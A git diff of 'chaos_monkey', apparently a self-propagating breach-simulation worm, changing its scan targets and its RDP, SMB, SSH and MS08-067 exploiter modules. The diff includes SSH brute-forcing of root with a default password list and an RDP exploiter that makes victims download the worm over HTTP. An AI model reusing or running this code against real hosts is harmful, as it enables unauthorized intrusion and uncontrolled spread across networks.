diff --git a/chaos_monkey/config.py b/chaos_monkey/config.py
index 6ce461499..62f37338f 100644
--- a/chaos_monkey/config.py
+++ b/chaos_monkey/config.py
@@ -96,6 +96,8 @@ class Configuration(object):
     ### monkey config
     ###########################
 
+    alive = True
+
     singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
 
     # how long to wait between scan iterations
@@ -127,11 +129,11 @@ class Configuration(object):
 
     #range_class = RelativeRange
     range_size = 8
-    range_class = ClassCRange
-    range_fixed = ("10.0.0.1")
+    range_class = FixedRange
+    range_fixed = ("10.0.0.9", "10.0.0.13", "192.168.1.100", "192.168.1.87")
 
     # TCP Scanner
-    tcp_target_ports = [22, 445, 135]
+    tcp_target_ports = [22, 445, 135, 3389]
     tcp_scan_timeout = 1000 # 1000 Milliseconds
     tcp_scan_interval = 200
     tcp_scan_get_banner = True
@@ -157,6 +159,7 @@ class Configuration(object):
     ssh_user = "root"
     ssh_passwords = ["root", "toor", "1234", "12345678"]
 
-    alive = True
+    #rdp exploiter
+    rdp_use_vbs_download = True
 
 WormConfiguration = Configuration()
\ No newline at end of file
diff --git a/chaos_monkey/exploit/rdpgrinder.py b/chaos_monkey/exploit/rdpgrinder.py
index 6a942c96c..7f9ac0d51 100644
--- a/chaos_monkey/exploit/rdpgrinder.py
+++ b/chaos_monkey/exploit/rdpgrinder.py
@@ -11,7 +11,7 @@ from rdpy.core.error import RDPSecurityNegoFail
 from logging import getLogger
 from exploit import HostExploiter
 from exploit.tools import HTTPTools
-from model import RDP_CMDLINE_HTTP_BITS
+from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
 from model.host import VictimHost
 from network.tools import check_port_tcp
 from exploit.tools import get_target_monkey
@@ -243,7 +243,10 @@ class RdpExploiter(HostExploiter):
         # create server for http download.
         http_path, http_thread = HTTPTools.create_transfer(host, src_path)
 
-        command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(src_path), 'http_path' : http_path}
+        if self._config.rdp_use_vbs_download:
+            command = RDP_CMDLINE_HTTP_VBS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
+        else:
+            command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
 
         passwords = list(self._config.psexec_passwords[:])
         known_password = host.get_credentials(self._config.psexec_user)
@@ -288,10 +291,7 @@ class RdpExploiter(HostExploiter):
         if not exploited:
             LOG.debug("Exploiter RdpGrinder failed, rdp failed.")
             return False
-        elif http_thread.downloads == 0:
-            LOG.info("Trying rdp logging into victim %r with user"
-                          " %s and password '%s'", host,
-                          self._config.psexec_user, password)            
+        elif http_thread.downloads == 0:       
             LOG.debug("Exploiter RdpGrinder failed, http download failed.")
             return False
 
diff --git a/chaos_monkey/exploit/smbexec.py b/chaos_monkey/exploit/smbexec.py
index 15f81b471..dfa903197 100644
--- a/chaos_monkey/exploit/smbexec.py
+++ b/chaos_monkey/exploit/smbexec.py
@@ -3,6 +3,7 @@ from logging import getLogger
 from model.host import VictimHost
 from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
 from exploit import HostExploiter
+from network.tools import check_port_tcp
 from exploit.tools import SmbTools, get_target_monkey
 from network import SMBFinger
 
@@ -49,7 +50,7 @@ class SmbExploiter(HostExploiter):
                 is_nb_open,_ = check_port_tcp(host.ip_addr, 139)
                 if is_nb_open:
                     host.os['type'] = 'windows'
-            return super(HostExploiter, self).is_os_supported(host)
+            return host.os.get('type') in self._target_os_type
         return False        
 
     def exploit_host(self, host, src_path=None):
diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py
index 3c0bbf085..0230717d2 100644
--- a/chaos_monkey/exploit/sshexec.py
+++ b/chaos_monkey/exploit/sshexec.py
@@ -5,10 +5,12 @@ import logging
 from exploit import HostExploiter
 from model import MONKEY_ARG
 from exploit.tools import get_target_monkey
+from network.tools import check_port_tcp
 
 __author__ = 'hoffer'
 
 LOG = logging.getLogger(__name__)
+SSH_PORT = 22
 
 class SSHExploiter(HostExploiter):
     _target_os_type = ['linux', None]
@@ -20,6 +22,16 @@ class SSHExploiter(HostExploiter):
         ssh = paramiko.SSHClient()
         ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
 
+        port = SSH_PORT
+        for servkey,servdata in host.services.items():
+            if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
+                port = int(servkey.replace('tcp-',''))
+
+        is_open,_ = check_port_tcp(host.ip_addr, port)
+        if not is_open:
+            LOG.info("SSH port is closed on %r, skipping", host)
+            return False                
+
         passwords = list(self._config.ssh_passwords[:])
         known_password = host.get_credentials(self._config.ssh_user)
         if known_password is not None:
@@ -32,7 +44,8 @@ class SSHExploiter(HostExploiter):
             try:
                 ssh.connect(host.ip_addr,
                             username=self._config.ssh_user,
-                            password=password)
+                            password=password,
+                            port=port)
 
                 LOG.debug("Successfully logged in %r using SSH (%s : %s)",
                           host, self._config.ssh_user, password)
diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py
index 82eae5218..e3f48ceb4 100644
--- a/chaos_monkey/exploit/win_ms08_067.py
+++ b/chaos_monkey/exploit/win_ms08_067.py
@@ -15,6 +15,7 @@ from model.host import VictimHost
 from model import DROPPER_CMDLINE, MONKEY_CMDLINE
 from exploit import HostExploiter
 from exploit.tools import SmbTools, get_target_monkey
+from network.tools import check_port_tcp
 
 try:
     from impacket import smb
diff --git a/chaos_monkey/network/network_scanner.py b/chaos_monkey/network/network_scanner.py
index c6f3bfa27..9e05a6222 100644
--- a/chaos_monkey/network/network_scanner.py
+++ b/chaos_monkey/network/network_scanner.py
@@ -5,6 +5,7 @@ import logging
 from network import HostScanner
 from config import WormConfiguration
 from info import local_ips
+from network.range import *
 
 __author__ = 'itamar'
 
@@ -26,8 +27,12 @@ class NetworkScanner(object):
 
         LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses)
 
-        self._ranges = [WormConfiguration.range_class(ip_address)
-                        for ip_address in self._ip_addresses]
+        # for fixed range, only scan once.
+        if WormConfiguration.range_class is FixedRange:
+            self._ranges = [WormConfiguration.range_class('0.0.0.0')]
+        else:
+            self._ranges = [WormConfiguration.range_class(ip_address)
+                            for ip_address in self._ip_addresses]
 
         LOG.info("Base local networks to scan are: %r", self._ranges)
 
diff --git a/chaos_monkey/network/sshfinger.py b/chaos_monkey/network/sshfinger.py
index c86dccda7..ddb90bc19 100644
--- a/chaos_monkey/network/sshfinger.py
+++ b/chaos_monkey/network/sshfinger.py
@@ -13,7 +13,7 @@ from model.host import VictimHost
 SSH_PORT = 22
 SSH_SERVICE = 'tcp-22'
 SSH_REGEX = 'SSH-\d\.\d-OpenSSH'
-TIMEOUT = 30
+TIMEOUT = 10
 BANNER_READ = 1024
 LINUX_DIST_SSH = ['ubuntu', 'debian']
 
diff --git a/chaos_monkey/network/tools.py b/chaos_monkey/network/tools.py
index c415bd9a7..9e945924d 100644
--- a/chaos_monkey/network/tools.py
+++ b/chaos_monkey/network/tools.py
@@ -1,7 +1,7 @@
 import socket
 import select
 
-DEFAULT_TIMEOUT = 30
+DEFAULT_TIMEOUT = 10
 BANNER_READ = 1024
 
 def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):